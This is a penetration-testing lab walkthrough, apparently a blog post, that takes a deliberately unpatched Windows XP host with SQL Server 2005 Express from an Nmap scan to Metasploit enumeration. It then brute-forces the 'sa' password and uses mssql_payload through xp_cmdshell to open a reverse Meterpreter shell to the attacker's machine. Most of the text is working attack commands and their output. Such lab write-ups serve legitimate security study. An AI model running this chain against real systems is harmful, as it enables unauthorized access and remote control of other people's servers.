The exploitee's system comprises:
- Windows XP Pro Service Pack 2 (unpatched)
- Firewall and software updates switched off
- Microsoft Internet Information Services (IIS) (server) and FTP service enabled
- SQL Server 2005 Express configured
- A vulnerable web app up and running
Let's begin: Nmap scan from within Metasploit.
The pertinent results for this exploit are:
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00 Running: Microsoft Windows XP|2003OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003Interestingly, Nmap couldn’t definitively identify which Windows Service Pack, but of course, I know it’s Service Pack 2.
MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:
nmap -sU 192.168.1.79 -p1434
PORT STATE SERVICE1434/udp open|filtered ms-sql-m
And, the scan confirms this. Now, use Metasploit mssql_ping to pick up more information:
msf > use scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79RHOSTS => 192.168.1.79msf auxiliary(mssql_ping) > set THREADS 20THREADS => 20msf auxiliary(mssql_ping) > exploit
[*] SQL Server information for 192.168.1.79:[+] ServerName = LAB[+] InstanceName = SQLEXPRESS[+] IsClustered = No[+] Version = 9.00.1399.06[+] tcp = 1433[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
There's lots of information here. Now, brute force MS SQL with mssql_login:
>msf > use scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txtPASS_FILE => /usr/share/set/src/fasttrack/wordlist.txtmsf auxiliary(mssql_login) > set RHOSTS 192.168.1.79RHOSTS => 192.168.1.79msf auxiliary(mssql_login) > set THREADS 10THREADS => 10msf auxiliary(mssql_login) > exploit
[+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′
MS SQL password and login successfully guessed. Now, use the mssql_payload, which exploits xp_cmdshell:
msf > use windows/mssql/mssql_payloadmsf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(mssql_payload) > set LHOST 192.168.1.70LHOST => 192.168.1.70msf exploit(mssql_payload) > set LPORT 443LPORT => 443msf exploit(mssql_payload) > set RHOST 192.168.1.79RHOST => 192.168.1.79msf exploit(mssql_payload) > set PASSWORD password1PASSWORD => password1msf exploit(mssql_payload) > exploit
[*] Started reverse handler on 192.168.1.70:443[*] The server may have xp_cmdshell disabled, trying to enable it…[*] Command Stager progress – 1.47% done (1499/102246 bytes)
[….]
[*] Sending stage (751104 bytes) to 192.168.1.79[*] Command Stager progress – 100.00% done (102246/102246 bytes)[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100
meterpreter >
So, I’m inside the target machine with the Meterpreter shell. I hope this was helpful to you. Please post your comments and questions below.
